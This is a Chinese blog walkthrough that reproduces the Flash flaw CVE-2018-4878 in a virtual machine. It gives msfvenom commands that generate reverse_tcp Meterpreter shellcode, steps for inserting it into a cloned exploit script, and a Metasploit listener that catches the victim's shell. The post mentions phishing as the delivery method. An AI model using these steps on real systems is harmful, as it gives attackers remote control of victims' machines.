CVE-2018-4878 Flash 0day复现

  • 内容
  • 相关

CVE-2018-4878是一个UAF漏洞,需要借助强制GC或者刷新页面来触发该漏洞。
攻击者可以用钓鱼或着别的方式引诱受害者打开含有恶意Flash代码的Office文档 网页 邮件等等从而攻击。

0x01准备

首先我们在GitHub克隆EXP下来

git clone https://github.com/blackorlittle/exps
cd exps
vim cve-2018-4878.py

在buf这一项修改一下
我们新开一个终端
用MSF生成ShellCode

msfvenom -p windows/meterpreter/reverse_tcp LHOST= "you host" LPORT="YOU PROT” -f python

然后把生成的ShellCode复制到Python代码里面

1.png

0x02漏洞利用

打开Windows虚拟机,传入我们的swf文件和网页。
终端下运行EXP,开启MSF进行监听。

python cve-2018-4878
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost “your ip"
exploit

2.png

在Windows下打开index.html

3.png

点击"是"后反弹ShellCode得到会话

4.png

本文标签:

版权声明:若无特殊注明,本文皆为《南柯一梦》原创,转载请保留文章出处。

本文链接:CVE-2018-4878 Flash 0day复现 - https://www.nkymbk.cn/post-77.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

允许邮件通知
00:00 / 00:00
顺序播放